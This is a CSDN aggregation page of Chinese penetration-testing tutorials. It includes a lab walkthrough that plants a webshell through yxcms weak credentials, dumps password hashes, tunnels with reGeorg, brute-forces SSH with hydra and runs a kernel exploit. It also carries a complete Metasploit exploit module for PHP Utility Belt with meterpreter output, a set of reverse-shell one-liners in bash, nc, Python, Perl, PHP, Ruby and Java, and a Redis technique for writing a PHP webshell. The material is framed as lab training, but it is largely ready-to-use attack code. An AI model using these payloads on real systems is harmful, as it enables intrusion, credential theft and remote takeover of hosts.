php 渗透shell_shell渗透 - CSDN
精华内容
参与话题
  • 靶场练习实验 文章目录靶场练习实验实验工具搭建环境实验要求实验步骤第一个Flag(弱口令)寻找第二个Flag()生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个...

    记一次靶场练习实验

    实验工具

    VMware Workstation 15 Player
    百度云链接 提取码:xbb5

    搭建环境

    1.外网靶场 IP:192.168.100.130 NAT模式
    2.调整物理机的网卡VMnet8的ipv4为192.168.100.1
    3.期间不允许使用虚拟机

    实验要求

    在两个靶场中找出三个flag

    实验步骤

    1.信息收集

    在这里插入图片描述
    进入网页之后发现是yxcms,可百度搜索与yxcms的相关信息。

    第一个Flag(弱口令)

    百度搜索yxcms的后台登陆页面,以及管理员的默认账号密码,看是否有弱口令的存在。
    后台登陆页面为:http://192.168.100.130/index.php?r=admin
    管理员的默认账号:admin 密码:123456
    发现登陆成功,后台存在弱口令
    进入后台之后找到前台模板模块,点击模块管理
    在这里插入图片描述
    发现页面的内容是可以编辑的,这是就可以想到将首页的代码直接改为大马的代码,重新刷新首页,发现成功显示的我们的大马文件
    在这里插入图片描述
    上传大马之后,直接执行命令,使用whoami查看权限
    在这里插入图片描述
    发现已经是system权限,所以就不用再提权了。此时我们应该考虑的就是想办法查看登录主机的密码。
    由于没有登陆过虚拟机,系统中就没有缓存,所以mimikatz不能显示出密码,在这里我推荐一款密码查看工具:QuarksPwDump,这个工具可以导出密码的哈希值,然后直接百度搜索MD5,解密即可。
    Windows系统中,可将QuarksPwDump.exe上传至C://Windows/temp下,(可读可写可执行),然后在执行命令模块中,将C:/WINDOWS/Temp/QuarksPwDump.exe写入命令行
    在这里插入图片描述
    得到了--dump-hash-local之后,复制,再次执行命令C:/WINDOWS/Temp/QuarksPwDump.exe --dump-hash-local导出哈希值
    在这里插入图片描述
    经过MD5的解密,密码为Hallo
    此时就可以远程登录主机了,但是有一个前提,使用命令netstat -ano查看是否开放了3389端口。
    在这里插入图片描述
    确认3389端口开放之后,使用物理机,win+R之后输入mstsc启用远程桌面。输入IP之后,使用刚才导出的账号以及密码
    在这里插入图片描述
    注:如果对方未开启3389的话使用一句话命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f打开3389端口
    此时就找到了flag1。原来藏在这丫。

    寻找第二个Flag(hydra密码爆破)

    进入主机之后,使用ipconfig查看主机IP
    在这里插入图片描述
    由此可以猜想内网的IP为172.16.1.1
    桌面上有一个xshell的工具,是这台主机连接内网的工具,点开之后可以看到内网的IP确实为172.16.1.1,还得到了内网的用户名为admin
    在这里插入图片描述
    当连接的时候却需要爆破密码,这时就需要用到kali中的工具hydra。
    这是就又涉及到了端口转发,通过大马上传reGeorg-master中的tunnel.nosocket.php文件到网站目录,打开之后,能够成功使用
    在这里插入图片描述
    然后运行kali中的reGeorgSocksProxy.py文件,使用命令python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocket.php运行成功之后,需要用到kali中一款叫proxychains
    首先修改proxychains中的配置文件,使用命令vi /etc/proxychains.conf打开配置文件之后找到最底部,将socks4修改为socks5 127.0.0.1 8888写完之后,wq保存退出
    在这里插入图片描述
    输入proxychains ssh 172.16.1.1登录内网但是需要输入password,此时就要用到工具hydra进行密码爆破,先使用命令gedit pass.txt自己写入一个字典文件,==(切记:写完最后一行之后千万不要点击回车,直接保存退出)==直接运行hydra使用命令proxychains hydra -l admin -p pass.txt ssh://172.16.1.1然后成功爆破出密码为123456
    在这里插入图片描述
    此时返回外网主机,通过xshell连接内网主机。成功进入主机之后我有个习惯,就是使用history查看管理员历史输入,然后发现了第二个flag
    在这里插入图片描述

    寻找第三个Flag(Linux提权)

    通过上一步的密码爆破,输入id查看用户权限,
    在这里插入图片描述
    发现是普通用户权限,所以需要进行提权操作,输入命令uname -a查看系统信息
    在这里插入图片描述
    内核版本为2.6.18-194,使用相应的exp进行提权操作,将找到的exp通过大马上传至外网主机的目录下,然后通过命令wget 172.16.1.2/exp1 -O exp1进行下载操作,将exp1下载至内网目录下。
    在这里插入图片描述
    通过命令chmod 777 exp1修改exp1的权限为可读可写可执行,之后运行exp1成功提权为root用户。提权成功最明显的区别就是$和#的区别
    在这里插入图片描述
    通过ls查看当前目录下的文件,发现了第三个flag,本次实验结束!!!
    在这里插入图片描述
    [1]: http://meta.math.stackexchange.com/questions/5020/mathjax-basic-tutorial-and-quick-reference
    [2]: https://mermaidjs.github.io/
    [3]: https://mermaidjs.github.io/
    [4]: http://adrai.github.io/flowchart.js/

    展开全文
  • 转载请注明出处:... 攻击机 kali 192.168.109.137 靶机:Win XP 192.168.109.141 应用程序 php-utility-belt (可以到链接:https://download.csdn.net/download/l1028386804/109...

    转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86526103

    攻击机 kali 192.168.109.137

    靶机:Win XP 192.168.109.141

    应用程序 php-utility-belt (可以到链接:https://download.csdn.net/download/l1028386804/10923054 下载)

    1.部署php-utility-belt

    由于php-utility-belt是php程序,所以我们需要安装php环境,这里我为了简单直接安装了wamp环境。

    将php-utility-belt解压后放在wamp的www目录下,

    同时在浏览器中访问链接:http://192.168.109.141/php-utility-belt/

    如下图所示:

    显示这个页面就证明我们部署成功了。

    2.构造并提交攻击脚本

    我们文本框中输入如下代码:

    fwrite(fopen('info.php','w'), '<?php $a = "net user"; echo shell_exec($a);?>');

    并点击Run按钮

    3.查看php-utility-belt下的文件

    此时,我们发现php-utility-belt下多了一个info.php文件

    我们查看这个文件的内容:

    4.访问info.php

    我们在浏览器中输入:http://192.168.109.141/php-utility-belt/info.php 访问info.php。

    这里,会显示靶机上的所有用户,说明php-utility-belt存在漏洞。

    5.进一步分析php-utility-belt的漏洞

    在google或firefox浏览器按下F12键,通过对网页代码的分析,文本框中的数据是通过参数code进行post提交的。

    6.编写攻击脚本php_utility_belt_attack_by_binghe.rb

    ##
    # Author 冰河
    # Date 2019-01-17
    # Description Metasploit渗透 php utility belt
    ##
    
    require 'msf/core'
    
    class Metasploit4 < Msf::Exploit::Remote
      include Msf:: Exploit::Remote::HttpClient
      
      def initialize(info = {})
        super(update_info(info,
          'Name'              => 'PHP Utility Belt Remote Code Execution',
          'Description'       => %q{
              This module exploits a remote code execution vulnerability in P
            },
           'Author'           =>
            [
              'binghe'
            ],
           
           'DisclosureDate'   => '2019-01-17',
           'Platform'         => 'php',
           'Payload'          =>
            {
              'Space'         => 2000,
              # 现在的漏洞在一个Web应用程序中,而不是在软件程序中,所以要将DisableNops的值设置为true以关闭攻击载荷中的NOP
              'DisableNops'   => true   
            },
           
           'Targets'          =>
            [
              ['PHP Utility Belt', {}]
            ],
           'DefaultTarget'   => 0))
        
        register_options(
          [
            OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']),
            OptString.new('CHECKURI', [false, 'Checking Perpose', '/php-utility-belt/info.php']),
          ], self.class) 
        end
        
        def check
          send_request_cgi(
              'method'        => 'POST',
              'uri'           => normalize_uri(target_uri.path),
              'vars_post'     => {
                  'code'      => "fwrite(fopen('info.php','w'), '<?php echo phpinfo();?>');"
                }
          )   
        resp = send_request_raw({'uri'  => normalize_uri(datastore['CHECKURI']), 'method' => 'GET'})
        if resp.body = ~/phpinfo()/
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
       end
       
       def exploit
        send_request_cgi(
          'method'        => 'POST',
          'uri'           => normalize_uri(target_uri.path),
          'vars_post'     => {
            'code'        => payload.encoded
          }
        )
       end
       
    end

    7.上传攻击脚本php_utility_belt_attack_by_binghe.rb

    将攻击脚本php_utility_belt_attack_by_binghe.rb上传的Kali的/usr/share/metasploit-framework/modules/exploits/web/php目录下。

    8.运行攻击脚本php_utility_belt_attack_by_binghe.rb

    msfconsole
    use exploit/web/php/php_utility_belt_attack_by_binghe 
    set payload php/meterpreter/bind_tcp
    set RHOST 192.168.109.141
    show options
    exploit
    sysinfo

    具体操作效果如下:

    msf > use exploit/web/php/php_utility_belt_attack_by_binghe 
    msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcp
    payload => php/meterpreter/bind_tcp
    msf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141
    RHOST => 192.168.109.141
    msf exploit(web/php/php_utility_belt_attack_by_binghe) > show options
    
    Module options (exploit/web/php/php_utility_belt_attack_by_binghe):
    
       Name       Current Setting             Required  Description
       ----       ---------------             --------  -----------
       CHECKURI   /php-utility-belt/info.php  no        Checking Perpose
       Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOST      192.168.109.141             yes       The target address
       RPORT      80                          yes       The target port (TCP)
       SSL        false                       no        Negotiate SSL/TLS for outgoing connections
       TARGETURI  /php-utility-belt/ajax.php  yes       The path to PHP Utility Belt
       VHOST                                  no        HTTP server virtual host
    
    
    Payload options (php/meterpreter/bind_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LPORT  4444             yes       The listen port
       RHOST  192.168.109.141  no        The target address
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   PHP Utility Belt
    
    
    msf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit
    
    [*] Started bind TCP handler against 192.168.109.141:4444
    [*] Sending stage (38247 bytes) to 192.168.109.141
    
    meterpreter > sysinfo
    Computer    : LIUYAZHUANG
    OS          : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586
    Meterpreter : php/windows
    meterpreter > 

    到此,我们已经拿到了靶机的Shell,后续就可以进行各种渗透操作了。

     

    展开全文
  • 内网渗透-反弹Shell

    2020-07-07 16:22:31
    反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色...

    反弹Shell

    反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

    为什么要反弹shell?

    通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

    比如以下的情况:

    1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了;
    2. 目标机器的ip动态改变,你不能持续控制;
    3. 由于防火墙等限制,对方机器只能发送请求,不能接收请求;
    4. 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

    那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

    Bash反弹

    攻击过程

    Linux中一般默认的 Shell 是 bash,它功能几乎可以涵盖 Shell 所具有的功能,所以一般的 Shell 脚本都会指定它为执行路径。常用的 Shell有 ash、bash、dash、ksh、csh、zsh 等,不同的 Shell 都有自己的特点以及用途。Bash 反弹 Shell 是最简单、也是最常见的一种反弹 Shell 方式。

    主机 IP地址
    Ubuntu 虚拟机 192.168.43.221
    Kali Linux 攻击机 192.168.43.133

    1、首先在 Kali 攻击机使用 Netcat 监听本地 8081 端口:
    在这里插入图片描述
    2、在 Ubuntu 靶机中写入 反弹 shell 的命令:bash -i >& /dev/tcp/192.168.43.133/8081 0>&1,如图所示:
    在这里插入图片描述
    3、此时 Kali 攻击机即可成功反弹 shell:
    在这里插入图片描述
    4、关闭 Ubuntu 的命令终端窗口,以上会话自动断开连接:
    在这里插入图片描述

    原理简析

    命令 解析
    nc -lvp 8081 nc 是 netcat 的简写,可实现任意TCP/UDP端口的侦听;-l 监听,-v 输出交互或出错信息,-p 端口
    bash -i -i interactive,即产生一个交互式的shell(bash)。
    /dev/tcp/IP/PORT 特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。

    其实以上bash反弹一句完整的解读过程就是:

    Bash 产生了一个交互环境与本地主机主动发起与目标主机 8081 端口建立的连接(即TCP 8081 会话连接)相结合,然后在重定向个 TCP 8081会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个 bash 反弹环境。

    Bash反弹Shell的深层原理分析可参考以下博文:

    1、Linux之bash反弹shell原理浅析
    2、Linux反弹shell(一)文件描述符与重定向

    Netcat反弹

    在网络工具中有 “瑞士军刀” 美誉的 NetCat, 在我们用了N年了至今仍是爱不释手,不管是渗透还是取证,100KB的小身板却蕴含着巨大的能量。 今天我们来简单研究下如何使用 nc 反弹shell。

    正向反弹

    Netcat 正向反弹shell是在靶机上监听端口,然后攻击者连接;反向反弹shell 是在攻击者主机上监听端口,然后靶机连接。先来看看正向反弹:

    1、在 Ubuntu 靶机上执行命令开启端口监听:
    在这里插入图片描述

    2、在 Kali 攻击机上连接靶机的端口:nc 192.168.43.221 7777
    在这里插入图片描述
    3、此时 Ubuntu 靶机上显示连接成功:
    在这里插入图片描述

    4、此时 Kali 攻击机已反弹获得 Ubuntu 靶机的 Shell,可执行测试命令如下:
    在这里插入图片描述

    反向反弹

    上面已经说了,nc 反向反弹shell 是在攻击者主机上监听端口,然后靶机连接。下面进行实例演示:

    1、在 Kali 攻击机监听本地 6666 端口:
    在这里插入图片描述

    2、在 Ubuntu 靶机上执行命令连接 Kali 攻击机:nc -e /bin/bash 192.168.43.133 6666
    在这里插入图片描述

    3、此时 Kali 攻击机即可获得反弹 Shell,执行测试命令如下:
    在这里插入图片描述

    进阶】 以上是针对 Linux 操作系统的反弹 Shell 的方式,如果目标是windows系统,只需要把/bin/bash换成cmd.exe绝对路径即可,当然这个cmd.exe可以是C:\Windows\System32\cmd.exe,亦可以是通过webshell上传的cmd.exe,实战的话后者更多一点。

    Netcat 被用作网络的测试工具或黑客工具,使用它你可以轻易的建立任何连接,同时它还内建有很多实用的工具。 nc 除了以上创建反弹 Shell (或者说是创建后门)的功能外,还可以进行文件传输、加密流量等。Netcat 的更多使用方法可以参考其他博文:

    (1) NetCat使用指南
    (2)10 个例子教你学会 ncat (nc) 命令

    同时也可以使用 -h 实时查看参数使用方法:
    在这里插入图片描述

    Python反弹

    有一种现实的情况是,现实的受害主机可能不会给你提供 netcat 的环境,你也不会那么轻易成功将 nc 上传至靶机,所以更多的情况需要你就地取材,网上有大佬整理了各种版本的反弹 shell 的脚本语言写法,在此借鉴:

    1、Python版本:
    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    
    2、Perl版本:
    perl -e 'use Socket;$i="192.168.10.13";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
     
    3、PHP版本:
    php -r '$sock=fsockopen("192.168.10.13",8888);exec("/bin/sh -i <&3>&3 2>&3");'
     
    4、Ruby版本:
    ruby -rsocket -e'f=TCPSocket.open("192.168.10.13",8888).to_i;exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)'
     
    5、Java版本:
    r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.10.13/8888;cat <&5 2="" |="" while="" read="" line;="" do="" \$line="">&5 >&5; done"] as String[]) p.waitFor()
    

    下面演示一下 Python 脚本语言反弹 Shell 的方法:

    1、首先使用 nc 在 Kali 上监听端口:
    在这里插入图片描述
    2、在 Ubuntu 虚拟机下使用 Python 脚本去反向连接,如下:
    在这里插入图片描述3、此时 Kali 终端即可获得 Shell:
    在这里插入图片描述
    最后说一下,我们也可以使用 Kali 的 MSF 框架生成的木马来反弹 Shell,可参考我的另一篇博文:渗透测试-Kali入侵Win7主机
    在这里插入图片描述
    另外关于内网渗透,除了反弹 Shell 还经常涉及 端口转发正向代理 的概念,读者可参见另一篇博文:内网渗透-正向代理

    展开全文
  • redis渗透中的getshell问题总结

    万次阅读 2020-05-10 10:36:31
     0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan...不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 ...
    
    0x00 前言
    redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库,redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。
     
    0x01 redis端口探测
    6379
    判断时,使用python客户端进行扫描,或者直接在浏览器上访问6379查看banner信息:
     
    0x02 本地装一个cli
    运行redis-cli -h [hostname] -p [port]
    比如10.10.10.1的6379是开放的,那么连接:
    redis-cli -h 10.10.10.1进入redis的交互shell。
     
    0x03 利用redis写入shell
    条件:
    (1)redis服务器上有web服务器
    (2)web根目录已知
    原理:
    redis中有一种数据备份的方式是备份至.rdb文件,在配置文件中的dbfilename中
    这种备份方式是根据时间的频率来进行保存的。
    但是redis中有个config set命令可以修改redis运行时的配置选项。
    其中redis.conf中有个dir选项可以选择保存dump.rdb的目录,默认是当前目录:
    我们可以控制dir和dbfilename选项,将shell写入到网站的根目录(假设为/var/www/html)下:
    CONFIG SET dir /var/www/html     # 修改备份目录
    CONGIG SET dbfilename shell.php  # 修改备份文件名为我们的shell名
    
    创建一个字符串,这样在备份时可以写入备份文件中。
    SET shell "<?php system($_GET['cmd']);?>"
    
    将数据备份到磁盘中:
    BGSAVE
     
     
    0x04 清除痕迹
    (1)删除key
    (2)将dir和dbfilename更为原样
    最好使用config get事先看看原来的值是啥。
    DEL payload
    CONFIG SET dir /usr/local/redis
    CONGIG SET dbfilename dump.rdb
    0x05 测试
    访问shell:
    0x06 问题
    (1)一个是有人在drops上说备份的数据文件默认权限是0600,但是本地使用root运行redis没有这个权限问题,可以成功写入。
    (2)一般来说,redis中使用备份数据的时候,会把以前的数据完整备份一遍,也就是说这个数据库持久化文件很可能会非常大,apache读不读的出来还是一回事儿,太大说不定直接阻塞down掉。一种方法是将全部的数据备份,再flushall,再备份导出shell,然后利用第一步的持久化文件进行恢复,这样做可能会造成一定的数据丢失,对站点造成损害,还是不推荐使用。
    展开全文
  • 渗透测试-PhpMyAdmin后台getshell

    千次阅读 2019-08-10 22:28:30
    在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell。 MySQL导出木马 最常用的是通过into outfile直接写入一句话木马: select '&...
  • msf反弹shell内网渗透

    2019-10-23 11:48:26
    用法示例: 1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection -o xx.ps1 //生成文件放在目标机目录下 //powershell执行脚本:...
  • 记一次从零到getshell渗透历程

    多人点赞 热门讨论 2020-08-06 18:36:25
    记一次从零到getshell渗透历程 文章目录记一次从零到getshell渗透历程0x00 前期0x01 初显进展0x02 登录旁站0x03 自助提权0x04 getshell 前段时间,银行和GOV的项目给我难到自闭了,一个月就只挖了一个弱口令。...
  • 渗透之——NC反弹CMDSHELL提权总结

    千次阅读 2018-12-31 14:54:05
    Server-U等都不可以用的情况...1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下) web目录都是有写有读的权限,我们直接传NC进去 2:然后本地执行nc -vv -lp 52进行反弹 3:在...
  • 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。...
  • php168新版后台模板拿shell 技巧

    千次阅读 2012-05-02 12:06:19
    摘要:php168新版后台模板拿shell技巧 ,PHP类漏洞,安全周边,溜客安全信息网 ... 文章作者:Just4u 本人一向没什么技术文章,只是一个技巧,欢迎各位补充指点 刚刚看了黑影小子渗透cmd5的文章,说...
  • 本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 手动漏洞挖掘的原则 2. 漏洞的本质 3. 身份认证...
  • 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却...
  • 渗透中利用postgresql getshell

    千次阅读 2018-01-11 12:28:14
    研究postgresql数据库如何getshell是在渗透中遇到一个pgAdmin的web管理页面可以直接操作postgresql且通过网上的文章没有达到9.6版本getshell的效果所以便有了以下文章。解决新版本写入函数so文件创建函数失败问
  • 理论基础: 1、使用arp-scan -l命令进行主机扫描,确定主机ip; arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。...
  • 渗透-N种反弹shell方法

    千次阅读 2019-05-11 08:45:32
    渗透-N种反弹shell方法 简介 reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,...
  • 关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会...
  • 查看phpMyAdmin能否自定义导出文件目录的权限
  • utm_medium=social此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。确认版本首先可以通过接口来确认一下当前禅道的版本。...
  • 转载请注明出处:... 攻击机:Kali 192.168.109.137 靶机: Metasploitable2 192.168.109.159 内网另一台主机 Windows Server 2012 工具:Metasploit 目标计算机上的漏洞编号为CVE id 2012-1...
  • 前提:现在情况是已经上传了一句...http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
1 2 3 4 5 ... 20
收藏数 5,737
精华内容 2,294
关键字:

php 渗透shell